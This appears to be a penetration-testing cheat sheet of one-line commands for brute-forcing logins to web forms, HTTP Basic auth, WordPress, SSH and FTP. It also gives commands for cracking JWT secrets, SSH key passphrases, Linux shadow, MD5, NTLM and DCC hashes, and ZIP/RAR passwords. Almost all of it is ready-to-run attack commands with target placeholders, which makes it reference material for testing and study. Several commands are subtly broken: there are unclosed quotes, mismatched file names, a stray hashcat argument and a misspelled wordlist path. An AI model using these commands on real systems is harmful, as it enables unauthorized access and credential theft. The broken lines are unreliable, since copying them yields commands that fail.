Words Lists :

  • /usr/share/wordlists/rockyou.txt
  • /usr/share/wordlists/seclists/Passwords/Common-Credentials/best1050.txt
  • /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
  • /usr/share/wordlists/metasploit/unix_passwords.txt

HTTP POST Login Page

WFUZZ

wfuzz -c -z file,myWordList -u http://[TARGET_IP]:[TARGET_PORT]/login.php -d “username=FUZZ&password=FUZZ
Fuzz POST Login.

HYDRA

hydra -vV -L myUsersFile.txt  -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-post-form ‘/path/to/form.php:username=^USER^&password=^PASS^&login=Login:F=ChainNotOK
Brute Force HTTP POST form with valid username.

FUFF

ffuf -w myUsersFile.txt:W1,/usr/share/wordlists/rockyou.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://[TARGET_IP]/login -fc 200
Brute Force HTTP POST form with valid username.

WPSCAN (WordPress)

wpscan --url http://[TARGET_IP]/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt
Brute force WordPress user's credentials.

HTTP Basic Access Auth

HYDRA

hydra -vV -l myUser -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-get /path/
Brute Force HTTP Basic Access Authentication.

JWT

JOHN

john --format=HMAC-SHA512 jwt.txt --show
Crack JWT secret.

JWT-CRACKER

jwt-cracker [myToken] [myAlphabet] [myMaxSecretLengthExpected]
Brute force attack JWT token secret.

Default Alphabet : abcdefghijklmnopqrstuvwxyz

JWT_TOOL

jwt_tool [myToken] [myDictionary]
Dictionnary attack JWT token secret.

SSH

HYDRA

hydra -L myUsersFile -P myPassFile [TARGET_IP] ssh
Brute Force SSH.

SSH Private Key Passphrase

JOHN

/usr/share/john/ssh2john.py private_key > forjohn.txt
Prepare private key for John.

john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.txt
Crack private key passphrase.

FTP

HYDRA

hydra -vV -l myUser -P /usr/share/wordlists/rockyou.txt [TARGET_IP] ftp
Brute Force FTP Login.

Linux Unshadow

JOHN

unshadow /etc/passwd /etc/shadow > unshadowd.txt
Prepare passwd and shadow file for John.

john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
Crack user passwords.

john --show unshadow.txt
Display cracked passwords.

MD5

JOHN

john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Crack MD5 hash.

NTLM

JOHN

john --format=NT -w=/usr/share/wordlists/rockyou.txt hash.txt --pot=output.txt
Crack NTLM Hash.

DCC

HASHCAT

hashcat -a 0 -m 1100 0 '15a57c379ebdfea572ad1ff91eb6ef0c:Administrator' /usr/share/wordlists/rockyou.txt
Crack DCC (Domain Cached Credentials) hash.

ZIP

JOHN

zip2john myFile.zip > forjohn.txt
Prepare ZIP archive for John.

john forjohn.txt
Crack ZIP archive password.

HASHCAT

zip2john myFile.zip > forhashcat.txt
Remove name of the file and archive from the hash (at the beginning and the end).

hashcat -a 0 -m 13600 forhashcat.txt /usr/share/wordslist/rockyou.txt
Crack ZIP archive password.

FCRACKZIP

fcrackzip -v -D -p /usr/share/wordlists/rockyou.txt -u myZipFile.zip
Crack ZIP archive password.

RAR

JOHN

rar2john myFile.rar > forjohn.txt
Prepare RAR archive for John.

john forjohn.txt
Crack RAR archive password.